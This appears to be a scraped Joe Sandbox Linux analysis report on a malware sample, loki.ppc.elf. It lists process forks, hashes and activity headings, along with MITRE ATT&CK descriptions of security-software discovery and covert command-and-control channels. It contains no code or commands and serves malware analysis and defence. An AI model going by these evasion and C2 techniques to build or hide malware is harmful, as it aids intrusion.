Analysis Process: loki.ppc.elf PID: 5434, Parent PID: 5359

General

Start time (UTC):	02:52:56
Start date (UTC):	19/01/2025
Path:	/tmp/loki.ppc.elf
Arguments:	/tmp/loki.ppc.elf
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

File Activities

File Opened

File Read

File Moved

Process Activities

Process Forked

Prctl Requested

Thread Sleep

System Activities

Query System Information (uname)

Network Activities

Socket Listening

Socket Connecting

Chronological Activities

Analysis Process: loki.ppc.elf PID: 5436, Parent PID: 5434

General

Start time (UTC):	02:52:56
Start date (UTC):	19/01/2025
Path:	/tmp/loki.ppc.elf
Arguments:	-
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

File Activities

File Opened

File Read

Process Activities

Prctl Requested

Thread Sleep

Chronological Activities

Analysis Process: loki.ppc.elf PID: 5438, Parent PID: 5434

General

Start time (UTC):	02:52:56
Start date (UTC):	19/01/2025
Path:	/tmp/loki.ppc.elf
Arguments:	-
File size:	5388968 bytes
MD5 hash:	ae65271c943d3451b7f026d1fadccea6

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report loki.ppc.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Runtime Messages

Process Tree

Yara Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: loki.ppc.elf PID: 5434, Parent PID: 5359

General

File Activities

File Opened

File Read

File Moved

Process Activities

Process Forked

Prctl Requested

Thread Sleep

System Activities

Query System Information (uname)

Network Activities

Socket Listening

Socket Connecting

Chronological Activities

Analysis Process: loki.ppc.elf PID: 5436, Parent PID: 5434

General

File Activities

File Opened

File Read

Process Activities

Linux Analysis Report
loki.ppc.elf